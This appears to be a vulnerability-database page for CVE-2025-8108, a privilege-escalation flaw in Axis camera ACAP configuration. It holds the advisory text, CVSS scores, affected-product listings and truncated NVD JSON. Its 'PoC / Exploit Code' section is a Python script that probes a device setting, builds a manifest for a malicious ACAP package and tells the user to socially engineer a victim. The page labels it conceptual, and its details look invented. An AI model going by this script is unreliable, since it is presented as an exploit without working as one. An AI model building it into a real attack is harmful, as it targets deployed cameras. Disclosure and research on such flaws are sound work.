CVE-2025-8108

Description

An ACAP configuration file has improper permissions and lacks input validation, which could potentially lead to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application.

CVSS Details

CVSS Score

6.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:axis:axis_os:*:*:*:*:active:*:*:* - VULNERABLE

cpe:2.3:h:axis:a1210_\(-b\):-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:axis:a1214:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:axis:a1601:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:axis:a1610_\(-b\):-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:axis:a1710-b:-:*:*:*:*:*:*:* - NOT VULNERABLE

Axis ACAP应用支持的所有设备（具体版本需参考Axis官方安全公告）

启用了允许安装未签名ACAP应用程序功能的Axis设备

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-8108 PoC - ACAP Configuration File Exploitation
# Note: This is a conceptual PoC for educational and security research purposes only
# Unauthorized exploitation of this vulnerability is illegal

import requests
import json

TARGET_IP = "<target_device_ip>"
ACAP_CONFIG_PATH = "/etc/acap_config/app_config.json"

def check_unsigned_app_enabled(target_ip):
    """Check if unsigned ACAP apps are allowed"""
    config_url = f"http://{target_ip}/axis-cgi/param.cgi?action=list&group=apps"
    try:
        response = requests.get(config_url, timeout=10)
        if "UnsignedApps=enabled" in response.text:
            return True
    except Exception as e:
        print(f"Error checking config: {e}")
    return False

def create_malicious_acap():
    """Generate malicious ACAP package manifest"""
    malicious_config = {
        "app_name": "malicious_acap",
        "version": "1.0",
        "permissions": ["root_access", "config_write", "network_access"],
        "post_install_script": "exploit.sh"
    }
    return json.dumps(malicious_config)

def exploit_cve_2025_8108(target_ip):
    """Exploit ACAP configuration permission vulnerability"""
    print(f"[*] Targeting {target_ip}")
    
    if not check_unsigned_app_enabled(target_ip):
        print("[-] Unsigned ACAP apps not enabled")
        return False
    
    print("[+] Unsigned ACAP apps enabled - vulnerability may be exploitable")
    print("[*] Generate malicious ACAP package...")
    
    malicious_payload = create_malicious_acap()
    print(f"[+] Malicious config created: {malicious_payload}")
    print("[*] Next step: Social engineer victim to install the ACAP package")
    
    return True

if __name__ == "__main__":
    exploit_cve_2025_8108(TARGET_IP)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-8108
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-8108
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-8108/
[4] VulDB https://vuldb.com/cve/CVE-2025-8108
[5] https://www.axis.com/dam/public/38/20/aa/cve-2025-8108pdf-en-US-504218.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-8108", "sourceIdentifier": "[email protected]", "published": "2025-11-11T07:15:36.413", "lastModified": "2025-11-24T17:56:23.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An ACAP configuration file has improper permissions and lacks input validation, which could potentially lead to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}, {"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axis:axis_os:*:*:*:*:active:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.7.33", "matchCriteriaId": "CA971CF4-A732-4CA1-B8A3-D49BE30B3CE2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1210_\\(-b\\):-:*:*:*:*:*:*:*", "matchCriteriaId": "A1CDF5C3-76A2-4D39-91C7-0F6D76EA2D0C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1214:-:*:*:*:*:*:*:*", "matchCriteriaId": "C6BB6630-7BE9-4458-8778-9D6D03BE18E0"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1601:-:*:*:*:*:*:*:*", "matchCriteriaId": "1D256893-7BD3-40A6-9877-2DED01770AC5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1610_\\(-b\\):-:*:*:*:*:*:*:*", "matchCriteriaId": "02A7D1B6-D87A-47DF-8CB4-76AD56B450EA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1710-b:-:*:*:*:*:*:*:*", "matchCriteriaId": "AEBFC01F-286A-4FFC-B89D-BC6B9EE4B8C3"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1810-b:-:*:*:*:*:*:*:*", "matchCriteriaId": "FA6D214C-F555-44A9-952C-E53E00D6A77C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a8207-ve_mk_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB61500A-D634-436C-8BE9-00CEEC301B55"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1110-e:-:*:*:*:*:*:*:*", "matchCriteriaId": "E1321FB3-DCD0-414A-BC7E-34CB8CAFCC1A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1111-e:-:*:*:*:*:*:*:*", "matchCriteriaId": "9FFCF55C-BDCE-46AD-A1D4-208F27800F5E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1210-e:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BF027AB-CD4E-4E25-BA5D-63501B544001"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1211-e:-:*:*:*:*:*:*:*", "matchCriteriaId": "55CF4F2F-6FA7-47AC-9C8E-71CCAB97E166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1310-e_mk_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "55D1250F-54EB-46EE-AFBB-6C0C509A40CE"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1410_mk_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "1950A515-C3EC-4A2B-858F-22099AEA83DD"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1510:-:*:*:*:*:*:*:*", "matchCriteriaId": "5A49250A-CB14-4D29-9D6A-15369392147A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1511:-:*:*:*:*:*:*:*", "matchCriteriaId": "4FB5EDDB-5C7F-4C39-AA7B-C26B638BAF64"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1610-ve:-:*:*:*:*:*:*:*", "matchCriteriaId": "72DC480C-B6C1-4E76-BDB7-BC86729C2A71"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1710:-:*:*:*:*:*:*:*", "matchCriteriaId": "2EFEC3A4-559A-4DBC-92BB-A22AF7245FF9"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1720:-:*:*:*:*:*:*:*", "matchCriteriaId": "B8470994-3AB3-431F-8901-DBE5CB4A4384"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c6110:-:*:*:*:*:*:*:*", "matchCriteriaId": "AF22B591-6B05-4097-BD0E-B13A1D02A6B7"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c8110:-:*:*:*:*:*:*:*", "matchCriteriaId": "44E69A37-BB22-4340-98F8-6C13B90B5F6B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c8210:-:*:*:*:*:*:*:*", "matchCriteriaId": "65B41008-04FD-4D4F-8BFB-8121CF889A6C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:d1110:-:*:*:*:*:*:*:*", "matchCriteriaId": "B4833075-CCD0-4CC5-812E-6122C0C351C9"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:d201-s_xpt_q6075:-:*:*:*:*:*:*:*", "matchCriteriaId": "DBF859C1-5C9F-422A-813C-ADB7418F02AE"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:d2110-ve:-:*:*:*:*:*:*:*", "matchCriteriaId": "FF927000-C686-41E3-96EA-2C3C764FC2D3"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:d2210-ve:-:*:*:*:*:*:*:*", "matchCrite ... (truncated)